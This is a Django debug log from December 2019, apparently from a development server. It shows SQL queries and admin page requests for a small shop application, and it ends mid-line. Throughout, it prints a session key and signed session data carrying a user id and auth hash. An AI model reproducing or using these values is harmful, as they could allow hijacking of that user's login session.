2019-12-05 13:12:38,676 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:12:38] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 13:12:38] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [05/Dec/2019 13:12:38] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [05/Dec/2019 13:12:38] "GET /static/admin/img/tooltag-arrowright.svg HTTP/1.0" 200 280 DEBUG 2019-12-05 13:12:42,714 utils 28908 140676876654336 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:42.698642+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 12, 42, 698642, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:12:42,718 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:12:42,725 utils 28908 140676876654336 (0.003) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 13:12:42,727 utils 28908 140676876654336 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 13:12:42,734 utils 28908 140676876654336 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-05 13:12:42,908 utils 28908 140676876654336 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:12:42.904876+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 12, 42, 904876, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:12:42] "GET /shop/product/ HTTP/1.0" 200 8423 DEBUG 2019-12-05 13:12:43,242 utils 28908 140676876654336 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:43.229258+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 12, 43, 229258, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:12:43,246 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:12:43] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 13:12:44,818 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:44.808926+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 12, 44, 808926, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:12:44,821 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:12:44,864 utils 28908 140676876654336 (0.002) DECLARE "_django_curs_140676876654336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 13:12:44,914 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:12:44.912284+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 12, 44, 912284, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:12:44] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-05 13:12:45,233 utils 28908 140676876654336 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:12:45.218810+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 12, 45, 218810, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:12:45,237 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:12:45] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 13:14:28,142 utils 28908 140676876654336 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:14:28.127328+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 14, 28, 127328, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:14:28,147 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:14:28,196 utils 28908 140676876654336 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:14:28.192696+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 14, 28, 192696, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:14:28] "GET /shop/ HTTP/1.0" 200 2790 DEBUG 2019-12-05 13:14:29,461 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:14:29.452204+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 14, 29, 452204, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:14:29,464 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:14:29,466 utils 28908 140676876654336 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 13:14:29,467 utils 28908 140676876654336 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 13:14:29,472 utils 28908 140676876654336 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-05 13:14:29,549 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:14:29.546548+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 14, 29, 546548, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:14:29] "GET /shop/category/ HTTP/1.0" 200 4739 DEBUG 2019-12-05 13:14:29,835 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:14:29.826506+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 14, 29, 826506, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:14:29,838 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:14:29] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 13:14:31,853 utils 28908 140676876654336 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:14:31.837184+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 14, 31, 837184, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:14:31,858 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:14:31,862 utils 28908 140676876654336 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-05 13:14:31,918 utils 28908 140676876654336 (0.002) DECLARE "_django_curs_140676876654336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 13:14:31,952 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:14:31.950256+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 14, 31, 950256, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:14:31] "GET /shop/category/1/change/ HTTP/1.0" 200 6949 DEBUG 2019-12-05 13:14:32,243 utils 28908 140676876654336 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:14:32.228935+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 14, 32, 228935, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:14:32,248 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:14:32] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 13:15:44] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 13:16:35,643 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:16:35.632519+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 16, 35, 632519, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:16:35,646 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:16:35,651 utils 28908 140676876654336 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-05 13:16:35,725 utils 28908 140676876654336 (0.001) DECLARE "_django_curs_140676876654336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 13:16:35,775 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:16:35.772519+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 16, 35, 772519, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:16:35] "GET /shop/category/1/change/ HTTP/1.0" 200 6949 [05/Dec/2019 13:16:36] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [05/Dec/2019 13:16:36] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [05/Dec/2019 13:16:36] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 DEBUG 2019-12-05 13:16:36,317 utils 28908 140676850300672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:16:36.301544+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 16, 36, 301544, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:16:36,321 utils 28908 140676850300672 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:16:36] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 13:16:36] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [05/Dec/2019 13:16:36] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [05/Dec/2019 13:16:36] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [05/Dec/2019 13:16:36] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [05/Dec/2019 13:16:36] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [05/Dec/2019 13:16:36] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [05/Dec/2019 13:16:36] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [05/Dec/2019 13:16:36] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [05/Dec/2019 13:16:36] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [05/Dec/2019 13:16:36] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [05/Dec/2019 13:16:36] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [05/Dec/2019 13:16:36] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [05/Dec/2019 13:16:37] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [05/Dec/2019 13:16:37] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [05/Dec/2019 13:16:38] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [05/Dec/2019 13:16:38] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [05/Dec/2019 13:16:38] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 DEBUG 2019-12-05 13:18:28,802 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:18:28.792248+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 18, 28, 792248, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:18:28,805 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:18:28,807 utils 28908 140676861576960 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-05 13:18:28,854 utils 28908 140676861576960 (0.001) DECLARE "_django_curs_140676861576960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 13:18:28,889 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:18:28.886788+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 18, 28, 886788, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:18:28] "GET /shop/category/1/change/ HTTP/1.0" 200 6949 DEBUG 2019-12-05 13:18:29,068 utils 28908 140676861576960 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:18:29.053472+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 18, 29, 53472, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:18:29,072 utils 28908 140676861576960 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:18:29,076 utils 28908 140676861576960 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-05 13:18:29,155 utils 28908 140676861576960 (0.002) DECLARE "_django_curs_140676861576960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 13:18:29,207 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET 